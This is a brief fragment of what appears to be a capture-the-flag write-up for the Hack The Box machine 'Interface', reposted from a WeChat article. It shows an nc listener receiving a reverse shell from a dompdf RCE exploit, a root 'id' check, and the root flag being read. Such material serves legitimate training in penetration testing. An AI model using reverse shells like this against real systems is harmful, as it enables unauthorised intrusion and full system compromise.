┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ nc -lnvp 6666listening on [any] 6666 ...connect to [10.10.14.2] from (UNKNOWN) [10.129.72.208] 45822bash: cannot set terminal process group (6164): Inappropriate ioctl for devicebash: no job control in this shell[email protected]:~# ididuid=0(root) gid=0(root) groups=0(root)[email protected]:~# cat root.txtcat root.txt657c064e22ad2b8fe23348af755061e6
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NzYxMjI5OA==&mid=2247485695&idx=1&sn=bf6a9d3ede974e54b09abb8a6946913b&chksm=c06e679af719ee8c5425d4314044d15ae0797b39c312cbf65e45921af14e2b2305fcee5b6366#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh